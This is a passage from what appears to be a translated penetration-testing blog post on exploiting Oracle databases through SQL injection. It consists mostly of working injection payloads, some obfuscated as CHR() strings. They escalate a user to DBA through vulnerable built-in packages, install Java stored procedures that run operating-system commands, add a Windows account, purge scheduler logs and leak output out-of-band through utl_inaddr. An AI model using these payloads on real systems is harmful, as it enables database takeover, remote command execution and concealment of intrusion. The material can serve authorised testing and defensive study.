LIKE 'SYS_%' AND object_name NOT LIKE 'CREATE$%' AND object_name NOT LIKE 'JAVA$%' AND object_name NOT LIKE 'LOADLOB%') AND object_type LIKE 'JAVA %' ORDER BY object_type, object_name;\n'1'=utl_inaddr.get_host_name((select count(*) from user_objects where OBJECT_NAME='SasugaOracle'))--    #debugging through the web application\nsqlplus \/nolog  #log in locally\n<\/code><\/pre><\/div><\/div>\n<h3 id=\"0x2-\u547d\u4ee4\u6267\u884c\">0x2 Command execution<\/h3>\n<p>If DBA can be obtained, obtain DBA, then grant javasyspriv, create the class, create javacmd and execute commands. If DBA cannot be obtained, use dbms_xmlquery.newcontext to grant the execute FilePermission (on 10g write and read are additionally required).<\/p>\n<ul>\n  <li>Several functions for escalating to DBA (only GET_DOMAIN_INDEX_TABLES has worked for me)<\/li>\n<\/ul>\n\n<div class=\"highlighter-rouge\"><div class=\"highlight\"><pre class=\"highlight\"><code>#Create the privilege-escalation function\nand (select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION; begin execute immediate ''create or replace function pwn return varchar2 authid current_user is PRAGMA autonomous_transaction;BEGIN execute immediate ''''grant dba to TEST'''';commit;return ''''z'''';END; ''; commit; end;') from dual) is not null --\n\nEscalation via SYS.LT.CREATEWORKSPACE, 9iR2, 10gR1, 10gR2 and 11gR1     #fixed 2009.7\nand (select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION; begin execute immediate ''\nbegin SYS.LT.CREATEWORKSPACE(''''A10'''''''' and TEST.pwn()=''''''''x'''');SYS.LT.REMOVEWORKSPACE(''''A10'''''''' and TEST.pwn()=''''''''x'''');end;''; commit; end;') from dual) is not null --#failed locally\n\nEscalation via sys.dbms_cdc_publish.create_change_set, 10gR1, 10gR2, 11g R1 and 11gR2   #fixed 2010.10\nselect dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION; begin execute immediate '' begin 
sys.dbms_cdc_publish.create_change_set('''' a'''',''''a'''',''''a''''''''||TEST.pwn()||''''''''a'''',''''Y'''',sysdate,sysdate);end;''; commit; end;') from dual--#failed locally\n\nUsing GET_DOMAIN_INDEX_TABLES, Oracle 8.1.7.4, 9.2.0.1 - 9.2.0.7, 10.1.0.2 - 10.1.0.4, 10.2.0.1-10.2.0.2\n' and (select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('foo','bar','DBMS_OUTPUT\".PUT_LINE(:P1); EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION; BEGIN EXECUTE IMMEDIATE ''''grant dba to TEST''''; END;''; END;--', '', 0, '1', 0) from dual)=0--#note: tested successfully on 10.2.0.1\n<\/code><\/pre><\/div><\/div>\n<ul>\n  <li>Direct command execution with DBA privileges on 11g    #test database<\/li>\n<\/ul>\n\n<div class=\"highlighter-rouge\"><div class=\"highlight\"><pre class=\"highlight\"><code>PL\/SQL:\nbegin\nDBMS_SCHEDULER.create_program('myprog11','EXECUTABLE','net user pwned pwn3d!! \/add',0,TRUE);\nDBMS_SCHEDULER.create_job(job_name=&gt;'myjob11',program_name=&gt;'myprog11',\nstart_date=&gt;NULL,repeat_interval=&gt;NULL,end_date=&gt;NULL,enabled=&gt;TRUE,auto_drop=&gt;TRUE);\ndbms_lock.sleep(1);\ndbms_scheduler.drop_program(program_name=&gt;'myprog11');\ndbms_scheduler.purge_log;\nend;\n#as SQL injection:\n' and (select SYS.KUPP$PROC.CREATE_MASTER_PROCESS('DBMS_SCHEDULER.create_program(''myprog10'',''EXECUTABLE'',''net user pwnedfromweb pwn3d!! 
\/add'',0,TRUE);DBMS_SCHEDULER.create_job(job_name=&gt;''myjob10'',program_name=&gt;''myprog10'',start_date=&gt;NULL,repeat_interval=&gt;NULL,end_date=&gt;NULL,enabled=&gt;TRUE,auto_drop=&gt;TRUE);dbms_lock.sleep(1);dbms_scheduler.drop_program(program_name=&gt;''myprog10'');dbms_scheduler.purge_log;')from dual) is not null --\nOracle Database 11g Express Edition Release 11.2.0.2.0 \u2013 Production #test failed\nOracle Database 11g Enterprise Edition Release 11.2.0.1.0 - 64bit Production    #test failed\n\nReference article\nhttps:\/\/www.notsosecure.com\/hacking-oracle-xe-from-web\/\n<\/code><\/pre><\/div><\/div>\n<ul>\n  <li>Granting the required privileges as DBA<\/li>\n<\/ul>\n\n<div class=\"highlighter-rouge\"><div class=\"highlight\"><pre class=\"highlight\"><code>#only be executed by SYS.Affected Systems:8,9,10g R1,R2,11gR1\n(Select DBMS_REPCAT_RPC.VALIDATE_REMOTE_RC(USER,'VALIDATE_GRP_OBJECTS_LOCAL(:canon_gname); execute immediate ''declare pragma autonomous_transaction;begin execute immediate ''''grant dba to aaaa'''';end;''; end;--','CCCC') from dual) is not null-- \n(select 
DBMS_REPCAT_RPC.VALIDATE_REMOTE_RC(CHR(85)||CHR(83)||CHR(69)||CHR(82)||CHR(44)||CHR(86)||CHR(65)||CHR(76)||CHR(73)||CHR(68)||CHR(65)||CHR(84)||CHR(69)||CHR(95)||CHR(71)||CHR(82)||CHR(80)||CHR(95)||CHR(79)||CHR(66)||CHR(74)||CHR(69)||CHR(67)||CHR(84)||CHR(83)||CHR(95)||CHR(76)||CHR(79)||CHR(67)||CHR(65)||CHR(76)||CHR(40)||CHR(58)||CHR(99)||CHR(97)||CHR(110)||CHR(111)||CHR(110)||CHR(95)||CHR(103)||CHR(110)||CHR(97)||CHR(109)||CHR(101)||CHR(41)||CHR(59)||CHR(32)||CHR(101)||CHR(120)||CHR(101)||CHR(99)||CHR(117)||CHR(116)||CHR(101)||CHR(32)||CHR(105)||CHR(109)||CHR(109)||CHR(101)||CHR(100)||CHR(105)||CHR(97)||CHR(116)||CHR(101)||CHR(32)||CHR(39)||CHR(100)||CHR(101)||CHR(99)||CHR(108)||CHR(97)||CHR(114)||CHR(101)||CHR(32)||CHR(112)||CHR(114)||CHR(97)||CHR(103)||CHR(109)||CHR(97)||CHR(32)||CHR(97)||CHR(117)||CHR(116)||CHR(111)||CHR(110)||CHR(111)||CHR(109)||CHR(111)||CHR(117)||CHR(115)||CHR(95)||CHR(116)||CHR(114)||CHR(97)||CHR(110)||CHR(115)||CHR(97)||CHR(99)||CHR(116)||CHR(105)||CHR(111)||CHR(110)||CHR(59)||CHR(98)||CHR(101)||CHR(103)||CHR(105)||CHR(110)||CHR(32)||CHR(101)||CHR(120)||CHR(101)||CHR(99)||CHR(117)||CHR(116)||CHR(101)||CHR(32)||CHR(105)||CHR(109)||CHR(109)||CHR(101)||CHR(100)||CHR(105)||CHR(97)||CHR(116)||CHR(101)||CHR(32)||CHR(39)||CHR(39)||CHR(103)||CHR(114)||CHR(97)||CHR(110)||CHR(116)||CHR(32)||CHR(100)||CHR(98)||CHR(97)||CHR(32)||CHR(116)||CHR(111)||CHR(32)||CHR(97)||CHR(97)||CHR(97)||CHR(97)||CHR(39)||CHR(39)||CHR(59)||CHR(101)||CHR(110)||CHR(100)||CHR(59)||CHR(39)||CHR(59)||CHR(32)||CHR(101)||CHR(110)||CHR(100)||CHR(59)||CHR(45)||CHR(45)||CHR(44)||CHR(67)||CHR(67)||CHR(67)||CHR(67))from dual) is not null--\n\nOnly DBA can call this function\n(select SYS.KUPP$PROC.CREATE_MASTER_PROCESS(begin execute immediate 'grant javasyspriv to SYSTEM';end;)from dual) is not null   \n' AND (select 
SYS.KUPP$PROC.CREATE_MASTER_PROCESS(CHR(98)||CHR(101)||CHR(103)||CHR(105)||CHR(110)||CHR(32)||CHR(101)||CHR(120)||CHR(101)||CHR(99)||CHR(117)||CHR(116)||CHR(101)||CHR(32)||CHR(105)||CHR(109)||CHR(109)||CHR(101)||CHR(100)||CHR(105)||CHR(97)||CHR(116)||CHR(101)||CHR(32)||CHR(39)||CHR(103)||CHR(114)||CHR(97)||CHR(110)||CHR(116)||CHR(32)||CHR(106)||CHR(97)||CHR(118)||CHR(97)||CHR(115)||CHR(121)||CHR(115)||CHR(112)||CHR(114)||CHR(105)||CHR(118)||CHR(32)||CHR(116)||CHR(111)||CHR(32)||CHR(83)||CHR(89)||CHR(83)||CHR(84)||CHR(69)||CHR(77)||CHR(39)||CHR(59)||CHR(101)||CHR(110)||CHR(100)||CHR(59))from dual) is not null-- \n\nReference articles\nhttp:\/\/www.nocoug.org\/download\/2013-02\/NoCOUG_201302_Slavik_Markovich_SQL_Injection_in_Web_Applications.pdf\nhttps:\/\/media.blackhat.com\/bh-us-10\/whitepapers\/Siddharth\/BlackHat-USA-2010-Siddharth-Hacking-Oracle-from-the-Web-wp.pdf\n<\/code><\/pre><\/div><\/div>\n<ul>\n  <li>Command execution<\/li>\n<\/ul>\n\n<div class=\"highlighter-rouge\"><div class=\"highlight\"><pre class=\"highlight\"><code>1. hacking 10g  Oracle 8.1.7.4, 9.2.0.1 - 9.2.0.7, 10.1.0.2 - 10.1.0.4, 10.2.0.1-10.2.0.2\nORACLE DATABASE 10G ENTERPRISE EDITION RELEASE 10.2.0.1.0 (the VM for this version was lost; tested successfully earlier)\n1. Escalate the TEST user to DBA    the TEST username must be uppercase\n' and (select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('foo','bar','DBMS_OUTPUT\".PUT_LINE(:P1); EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION; BEGIN EXECUTE IMMEDIATE ''''grant dba to TEST''''; END;''; END;--', '', 0, '1', 0) from dual)=0--\n2. 
Create the Java package\n' and (select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('foo','bar','DBMS_OUTPUT\".PUT_LINE(:P1); EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION; BEGIN EXECUTE IMMEDIATE ''''create or replace and compile java source named \"SasugaOracle\" as import java.lang.*;import java.io.*;class SasugaOracle{public static String exec(String cmd){String ret=\"\",tmp;try{BufferedReader reader=new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(cmd).getInputStream()));while ((tmp=reader.readLine())!=null){ret+=tmp;}reader.close();}catch(Exception ex){ret=ex.toString();}return ret;}}''''; END;''; END;--', '', 0, '1', 0) from dual)=0--\n3. Grant the Java permission\n' and (select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT\".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission(''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''',''''''''&lt;&gt;'''''''',''''''''execute''''''''); end;'''';END;'';END;--','SYS',0,'1',0) from dual)=0--\nCreate the runcmd function\n' and (select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT\".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''create or replace function runcmd(cmd in varchar2) return varchar2 as language java name ''''''''SasugaOracle.exec(java.lang.String) return java.lang.String'''''''';'''';END;'';END;--','SYS',0,'1',0) from dual)=0--\n4. Grant execute to everyone\n' and (select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT\".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant execute on runcmd to public'''';END;'';END;--','SYS',0,'1',0) from dual)=0--\n5. Command execution\n' and 1=2 union select 1,sys.runcmd('cmd \/c ver'),2 from dual--\n\n2. 
hacking Oracle Database 11.1.0.7.0 and lower (The 11.2.0.1 April CPU patch fixes this)\nThe current user has DBA privileges\n1. #Grant Javasyspriv to SYSTEM; Only DBA can call this function\n(select SYS.KUPP$PROC.CREATE_MASTER_PROCESS(begin execute immediate 'grant javasyspriv to SYSTEM';end;)from dual) is not null   \n' AND (select SYS.KUPP$PROC.CREATE_MASTER_PROCESS(CHR(98)||CHR(101)||CHR(103)||CHR(105)||CHR(110)||CHR(32)||CHR(101)||CHR(120)||CHR(101)||CHR(99)||CHR(117)||CHR(116)||CHR(101)||CHR(32)||CHR(105)||CHR(109)||CHR(109)||CHR(101)||CHR(100)||CHR(105)||CHR(97)||CHR(116)||CHR(101)||CHR(32)||CHR(39)||CHR(103)||CHR(114)||CHR(97)||CHR(110)||CHR(116)||CHR(32)||CHR(106)||CHR(97)||CHR(118)||CHR(97)||CHR(115)||CHR(121)||CHR(115)||CHR(112)||CHR(114)||CHR(105)||CHR(118)||CHR(32)||CHR(116)||CHR(111)||CHR(32)||CHR(83)||CHR(89)||CHR(83)||CHR(84)||CHR(69)||CHR(77)||CHR(39)||CHR(59)||CHR(101)||CHR(110)||CHR(100)||CHR(59))from dual) is not null-- \n2. Create the javaexec package\n' and (select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION; begin execute immediate ''create or replace and resolve java source named \"javaexec\" as import java.lang.*;import java.io.*;public class javaexec{public static String Ecmd(String ss) throws IOException{BufferedReader mR= new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(ss).getInputStream()));String st,str=\"\";while ((st=mR.readLine()) != null) str += st+\"\\n\";mR.close();return str;}}'';commit; end;') from dual) where rownum=1--\n' and (select 
dbms_xmlquery.newcontext(CHR(100)||CHR(101)||CHR(99)||CHR(108)||CHR(97)||CHR(114)||CHR(101)||CHR(32)||CHR(80)||CHR(82)||CHR(65)||CHR(71)||CHR(77)||CHR(65)||CHR(32)||CHR(65)||CHR(85)||CHR(84)||CHR(79)||CHR(78)||CHR(79)||CHR(77)||CHR(79)||CHR(85)||CHR(83)||CHR(95)||CHR(84)||CHR(82)||CHR(65)||CHR(78)||CHR(83)||CHR(65)||CHR(67)||CHR(84)||CHR(73)||CHR(79)||CHR(78)||CHR(59)||CHR(32)||CHR(98)||CHR(101)||CHR(103)||CHR(105)||CHR(110)||CHR(32)||CHR(101)||CHR(120)||CHR(101)||CHR(99)||CHR(117)||CHR(116)||CHR(101)||CHR(32)||CHR(105)||CHR(109)||CHR(109)||CHR(101)||CHR(100)||CHR(105)||CHR(97)||CHR(116)||CHR(101)||CHR(32)||CHR(39)||CHR(99)||CHR(114)||CHR(101)||CHR(97)||CHR(116)||CHR(101)||CHR(32)||CHR(111)||CHR(114)||CHR(32)||CHR(114)||CHR(101)||CHR(112)||CHR(108)||CHR(97)||CHR(99)||CHR(101)||CHR(32)||CHR(97)||CHR(110)||CHR(100)||CHR(32)||CHR(114)||CHR(101)||CHR(115)||CHR(111)||CHR(108)||CHR(118)||CHR(101)||CHR(32)||CHR(106)||CHR(97)||CHR(118)||CHR(97)||CHR(32)||CHR(115)||CHR(111)||CHR(117)||CHR(114)||CHR(99)||CHR(101)||CHR(32)||CHR(110)||CHR(97)||CHR(109)||CHR(101)||CHR(100)||CHR(32)||CHR(34)||CHR(106)||CHR(97)||CHR(118)||CHR(97)||CHR(101)||CHR(120)||CHR(101)||CHR(99)||CHR(34)||CHR(32)||CHR(97)||CHR(115)||CHR(32)||CHR(105)||CHR(109)||CHR(112)||CHR(111)||CHR(114)||CHR(116)||CHR(32)||CHR(106)||CHR(97)||CHR(118)||CHR(97)||CHR(46)||CHR(108)||CHR(97)||CHR(110)||CHR(103)||CHR(46)||CHR(42)||CHR(59)||CHR(105)||CHR(109)||CHR(112)||CHR(111)||CHR(114)||CHR(116)||CHR(32)||CHR(106)||CHR(97)||CHR(118)||CHR(97)||CHR(46)||CHR(105)||CHR(111)||CHR(46)||CHR(42)||CHR(59)||CHR(112)||CHR(117)||CHR(98)||CHR(108)||CHR(105)||CHR(99)||CHR(32)||CHR(99)||CHR(108)||CHR(97)||CHR(115)||CHR(115)||CHR(32)||CHR(106)||CHR(97)||CHR(118)||CHR(97)||CHR(101)||CHR(120)||CHR(101)||CHR(99)||CHR(123)||CHR(112)||CHR(117)||CHR(98)||CHR(108)||CHR(105)||CHR(99)||CHR(32)||CHR(115)||CHR(116)||CHR(97)||CHR(116)||CHR(105)||CHR(99)||CHR(32)||CHR(83)||CHR(116)||CHR(114)||CHR(105)||CHR(110)||CHR(103)||CHR(32)||CHR(69)||CHR(99)||CHR(1
09)||CHR(100)||CHR(40)||CHR(83)||CHR(116)||CHR(114)||CHR(105)||CHR(110)||CHR(103)||CHR(32)||CHR(115)||CHR(115)||CHR(41)||CHR(32)||CHR(116)||CHR(104)||CHR(114)||CHR(111)||CHR(119)||CHR(115)||CHR(32)||CHR(73)||CHR(79)||CHR(69)||CHR(120)||CHR(99)||CHR(101)||CHR(112)||CHR(116)||CHR(105)||CHR(111)||CHR(110)||CHR(123)||CHR(66)||CHR(117)||CHR(102)||CHR(102)||CHR(101)||CHR(114)||CHR(101)||CHR(100)||CHR(82)||CHR(101)||CHR(97)||CHR(100)||CHR(101)||CHR(114)||CHR(32)||CHR(109)||CHR(82)||CHR(61)||CHR(32)||CHR(110)||CHR(101)||CHR(119)||CHR(32)||CHR(66)||CHR(117)||CHR(102)||CHR(102)||CHR(101)||CHR(114)||CHR(101)||CHR(100)||CHR(82)||CHR(101)||CHR(97)||CHR(100)||CHR(101)||CHR(114)||CHR(40)||CHR(110)||CHR(101)||CHR(119)||CHR(32)||CHR(73)||CHR(110)||CHR(112)||CHR(117)||CHR(116)||CHR(83)||CHR(116)||CHR(114)||CHR(101)||CHR(97)||CHR(109)||CHR(82)||CHR(101)||CHR(97)||CHR(100)||CHR(101)||CHR(114)||CHR(40)||CHR(82)||CHR(117)||CHR(110)||CHR(116)||CHR(105)||CHR(109)||CHR(101)||CHR(46)||CHR(103)||CHR(101)||CHR(116)||CHR(82)||CHR(117)||CHR(110)||CHR(116)||CHR(105)||CHR(109)||CHR(101)||CHR(40)||CHR(41)||CHR(46)||CHR(101)||CHR(120)||CHR(101)||CHR(99)||CHR(40)||CHR(115)||CHR(115)||CHR(41)||CHR(46)||CHR(103)||CHR(101)||CHR(116)||CHR(73)||CHR(110)||CHR(112)||CHR(117)||CHR(116)||CHR(83)||CHR(116)||CHR(114)||CHR(101)||CHR(97)||CHR(109)||CHR(40)||CHR(41)||CHR(41)||CHR(41)||CHR(59)||CHR(83)||CHR(116)||CHR(114)||CHR(105)||CHR(110)||CHR(103)||CHR(32)||CHR(115)||CHR(116)||CHR(44)||CHR(115)||CHR(116)||CHR(114)||CHR(61)||CHR(34)||CHR(34)||CHR(59)||CHR(119)||CHR(104)||CHR(105)||CHR(108)||CHR(101)||CHR(32)||CHR(40)||CHR(40)||CHR(115)||CHR(116)||CHR(61)||CHR(109)||CHR(82)||CHR(46)||CHR(114)||CHR(101)||CHR(97)||CHR(100)||CHR(76)||CHR(105)||CHR(110)||CHR(101)||CHR(40)||CHR(41)||CHR(41)||CHR(32)||CHR(33)||CHR(61)||CHR(32)||CHR(110)||CHR(117)||CHR(108)||CHR(108)||CHR(41)||CHR(32)||CHR(115)||CHR(116)||CHR(114)||CHR(32)||CHR(43)||CHR(61)||CHR(32)||CHR(115)||CHR(116)||CHR(43)||CHR(34)||CHR(92)||CHR(110)||CHR(34)||CHR(
59)||CHR(109)||CHR(82)||CHR(46)||CHR(99)||CHR(108)||CHR(111)||CHR(115)||CHR(101)||CHR(40)||CHR(41)||CHR(59)||CHR(114)||CHR(101)||CHR(116)||CHR(117)||CHR(114)||CHR(110)||CHR(32)||CHR(115)||CHR(116)||CHR(114)||CHR(59)||CHR(125)||CHR(125)||CHR(39)||CHR(59)||CHR(99)||CHR(111)||CHR(109)||CHR(109)||CHR(105)||CHR(116)||CHR(59)||CHR(32)||CHR(101)||CHR(110)||CHR(100)||CHR(59)) from dual) is not null--\n3. Create the javacmd function\n' and (select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION; begin execute immediate ''create or replace function javacmd(p_filename in varchar2)return varchar2 as language java name ''''javaexec.Ecmd(java.lang.String)return String'''';''; commit; end;') from dual) where rownum=1--\n' and (select dbms_xmlquery.newcontext(CHR(100)||CHR(101)||CHR(99)||CHR(108)||CHR(97)||CHR(114)||CHR(101)||CHR(32)||CHR(80)||CHR(82)||CHR(65)||CHR(71)||CHR(77)||CHR(65)||CHR(32)||CHR(65)||CHR(85)||CHR(84)||CHR(79)||CHR(78)||CHR(79)||CHR(77)||CHR(79)||CHR(85)||CHR(83)||CHR(95)||CHR(84)||CHR(82)||CHR(65)||CHR(78)||CHR(83)||CHR(65)||CHR(67)||CHR(84)||CHR(73)||CHR(79)||CHR(78)||CHR(59)||CHR(32)||CHR(98)||CHR(101)||CHR(103)||CHR(105)||CHR(110)||CHR(32)||CHR(101)||CHR(120)||CHR(101)||CHR(99)||CHR(117)||CHR(116)||CHR(101)||CHR(32)||CHR(105)||CHR(109)||CHR(109)||CHR(101)||CHR(100)||CHR(105)||CHR(97)||CHR(116)||CHR(101)||CHR(32)||CHR(39)||CHR(99)||CHR(114)||CHR(101)||CHR(97)||CHR(116)||CHR(101)||CHR(32)||CHR(111)||CHR(114)||CHR(32)||CHR(114)||CHR(101)||CHR(112)||CHR(108)||CHR(97)||CHR(99)||CHR(101)||CHR(32)||CHR(102)||CHR(117)||CHR(110)||CHR(99)||CHR(116)||CHR(105)||CHR(111)||CHR(110)||CHR(32)||CHR(106)||CHR(97)||CHR(118)||CHR(97)||CHR(99)||CHR(109)||CHR(100)||CHR(40)||CHR(112)||CHR(95)||CHR(102)||CHR(105)||CHR(108)||CHR(101)||CHR(110)||CHR(97)||CHR(109)||CHR(101)||CHR(32)||CHR(105)||CHR(110)||CHR(32)||CHR(118)||CHR(97)||CHR(114)||CHR(99)||CHR(104)||CHR(97)||CHR(114)||CHR(50)||CHR(41)||CHR(114)||CHR(101)||CHR(116)||CHR(117)||CHR(114)||CHR(110)||CHR(32)||C
HR(118)||CHR(97)||CHR(114)||CHR(99)||CHR(104)||CHR(97)||CHR(114)||CHR(50)||CHR(32)||CHR(97)||CHR(115)||CHR(32)||CHR(108)||CHR(97)||CHR(110)||CHR(103)||CHR(117)||CHR(97)||CHR(103)||CHR(101)||CHR(32)||CHR(106)||CHR(97)||CHR(118)||CHR(97)||CHR(32)||CHR(110)||CHR(97)||CHR(109)||CHR(101)||CHR(32)||CHR(39)||CHR(39)||CHR(106)||CHR(97)||CHR(118)||CHR(97)||CHR(101)||CHR(120)||CHR(101)||CHR(99)||CHR(46)||CHR(69)||CHR(99)||CHR(109)||CHR(100)||CHR(40)||CHR(106)||CHR(97)||CHR(118)||CHR(97)||CHR(46)||CHR(108)||CHR(97)||CHR(110)||CHR(103)||CHR(46)||CHR(83)||CHR(116)||CHR(114)||CHR(105)||CHR(110)||CHR(103)||CHR(41)||CHR(114)||CHR(101)||CHR(116)||CHR(117)||CHR(114)||CHR(110)||CHR(32)||CHR(83)||CHR(116)||CHR(114)||CHR(105)||CHR(110)||CHR(103)||CHR(39)||CHR(39)||CHR(59)||CHR(39)||CHR(59)||CHR(32)||CHR(99)||CHR(111)||CHR(109)||CHR(109)||CHR(105)||CHR(116)||CHR(59)||CHR(32)||CHR(101)||CHR(110)||CHR(100)||CHR(59)) from dual) is not null--\n4. Execute commands (javacmd returns the command output; in the union form the literal columns must match the count and types of the original query's columns, so the third column is the number 3, not a string)\n' and 1=2 union select 1,(select javacmd('whoami') from dual),3 from dual--\n'||utl_inaddr.get_host_name((select javacmd('ping 8.8.8.8') from dual))||'\n\nnot dba (on 11g java.io.FilePermission alone is enough; 10g additionally needs the RuntimePermission entries readFileDescriptor and writeFileDescriptor). The sequence below creates the javaexec Java source and the javacmd wrapper, then three helper functions myjava, myjava1 and myjava2 that each push one policy entry through DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS (java.io.FilePermission on &lt;&lt;ALL FILES&gt;&gt; with action execute, then RuntimePermission writeFileDescriptor, then RuntimePermission readFileDescriptor); each helper is invoked with ' and 1=myjavaN()-- before javacmd is called.\n' and (select\u0020
dbms_xmlquery.newcontext(CHR(100)||CHR(101)||CHR(99)||CHR(108)||CHR(97)||CHR(114)||CHR(101)||CHR(32)||CHR(80)||CHR(82)||CHR(65)||CHR(71)||CHR(77)||CHR(65)||CHR(32)||CHR(65)||CHR(85)||CHR(84)||CHR(79)||CHR(78)||CHR(79)||CHR(77)||CHR(79)||CHR(85)||CHR(83)||CHR(95)||CHR(84)||CHR(82)||CHR(65)||CHR(78)||CHR(83)||CHR(65)||CHR(67)||CHR(84)||CHR(73)||CHR(79)||CHR(78)||CHR(59)||CHR(32)||CHR(98)||CHR(101)||CHR(103)||CHR(105)||CHR(110)||CHR(32)||CHR(101)||CHR(120)||CHR(101)||CHR(99)||CHR(117)||CHR(116)||CHR(101)||CHR(32)||CHR(105)||CHR(109)||CHR(109)||CHR(101)||CHR(100)||CHR(105)||CHR(97)||CHR(116)||CHR(101)||CHR(32)||CHR(39)||CHR(99)||CHR(114)||CHR(101)||CHR(97)||CHR(116)||CHR(101)||CHR(32)||CHR(111)||CHR(114)||CHR(32)||CHR(114)||CHR(101)||CHR(112)||CHR(108)||CHR(97)||CHR(99)||CHR(101)||CHR(32)||CHR(97)||CHR(110)||CHR(100)||CHR(32)||CHR(114)||CHR(101)||CHR(115)||CHR(111)||CHR(108)||CHR(118)||CHR(101)||CHR(32)||CHR(106)||CHR(97)||CHR(118)||CHR(97)||CHR(32)||CHR(115)||CHR(111)||CHR(117)||CHR(114)||CHR(99)||CHR(101)||CHR(32)||CHR(110)||CHR(97)||CHR(109)||CHR(101)||CHR(100)||CHR(32)||CHR(34)||CHR(106)||CHR(97)||CHR(118)||CHR(97)||CHR(101)||CHR(120)||CHR(101)||CHR(99)||CHR(34)||CHR(32)||CHR(97)||CHR(115)||CHR(32)||CHR(105)||CHR(109)||CHR(112)||CHR(111)||CHR(114)||CHR(116)||CHR(32)||CHR(106)||CHR(97)||CHR(118)||CHR(97)||CHR(46)||CHR(108)||CHR(97)||CHR(110)||CHR(103)||CHR(46)||CHR(42)||CHR(59)||CHR(105)||CHR(109)||CHR(112)||CHR(111)||CHR(114)||CHR(116)||CHR(32)||CHR(106)||CHR(97)||CHR(118)||CHR(97)||CHR(46)||CHR(105)||CHR(111)||CHR(46)||CHR(42)||CHR(59)||CHR(112)||CHR(117)||CHR(98)||CHR(108)||CHR(105)||CHR(99)||CHR(32)||CHR(99)||CHR(108)||CHR(97)||CHR(115)||CHR(115)||CHR(32)||CHR(106)||CHR(97)||CHR(118)||CHR(97)||CHR(101)||CHR(120)||CHR(101)||CHR(99)||CHR(123)||CHR(112)||CHR(117)||CHR(98)||CHR(108)||CHR(105)||CHR(99)||CHR(32)||CHR(115)||CHR(116)||CHR(97)||CHR(116)||CHR(105)||CHR(99)||CHR(32)||CHR(83)||CHR(116)||CHR(114)||CHR(105)||CHR(110)||CHR(103)||CHR(32)||CHR(69)||CHR(99)||CHR(1
09)||CHR(100)||CHR(40)||CHR(83)||CHR(116)||CHR(114)||CHR(105)||CHR(110)||CHR(103)||CHR(32)||CHR(115)||CHR(115)||CHR(41)||CHR(32)||CHR(116)||CHR(104)||CHR(114)||CHR(111)||CHR(119)||CHR(115)||CHR(32)||CHR(73)||CHR(79)||CHR(69)||CHR(120)||CHR(99)||CHR(101)||CHR(112)||CHR(116)||CHR(105)||CHR(111)||CHR(110)||CHR(123)||CHR(66)||CHR(117)||CHR(102)||CHR(102)||CHR(101)||CHR(114)||CHR(101)||CHR(100)||CHR(82)||CHR(101)||CHR(97)||CHR(100)||CHR(101)||CHR(114)||CHR(32)||CHR(109)||CHR(82)||CHR(61)||CHR(32)||CHR(110)||CHR(101)||CHR(119)||CHR(32)||CHR(66)||CHR(117)||CHR(102)||CHR(102)||CHR(101)||CHR(114)||CHR(101)||CHR(100)||CHR(82)||CHR(101)||CHR(97)||CHR(100)||CHR(101)||CHR(114)||CHR(40)||CHR(110)||CHR(101)||CHR(119)||CHR(32)||CHR(73)||CHR(110)||CHR(112)||CHR(117)||CHR(116)||CHR(83)||CHR(116)||CHR(114)||CHR(101)||CHR(97)||CHR(109)||CHR(82)||CHR(101)||CHR(97)||CHR(100)||CHR(101)||CHR(114)||CHR(40)||CHR(82)||CHR(117)||CHR(110)||CHR(116)||CHR(105)||CHR(109)||CHR(101)||CHR(46)||CHR(103)||CHR(101)||CHR(116)||CHR(82)||CHR(117)||CHR(110)||CHR(116)||CHR(105)||CHR(109)||CHR(101)||CHR(40)||CHR(41)||CHR(46)||CHR(101)||CHR(120)||CHR(101)||CHR(99)||CHR(40)||CHR(115)||CHR(115)||CHR(41)||CHR(46)||CHR(103)||CHR(101)||CHR(116)||CHR(73)||CHR(110)||CHR(112)||CHR(117)||CHR(116)||CHR(83)||CHR(116)||CHR(114)||CHR(101)||CHR(97)||CHR(109)||CHR(40)||CHR(41)||CHR(41)||CHR(41)||CHR(59)||CHR(83)||CHR(116)||CHR(114)||CHR(105)||CHR(110)||CHR(103)||CHR(32)||CHR(115)||CHR(116)||CHR(44)||CHR(115)||CHR(116)||CHR(114)||CHR(61)||CHR(34)||CHR(34)||CHR(59)||CHR(119)||CHR(104)||CHR(105)||CHR(108)||CHR(101)||CHR(32)||CHR(40)||CHR(40)||CHR(115)||CHR(116)||CHR(61)||CHR(109)||CHR(82)||CHR(46)||CHR(114)||CHR(101)||CHR(97)||CHR(100)||CHR(76)||CHR(105)||CHR(110)||CHR(101)||CHR(40)||CHR(41)||CHR(41)||CHR(32)||CHR(33)||CHR(61)||CHR(32)||CHR(110)||CHR(117)||CHR(108)||CHR(108)||CHR(41)||CHR(32)||CHR(115)||CHR(116)||CHR(114)||CHR(32)||CHR(43)||CHR(61)||CHR(32)||CHR(115)||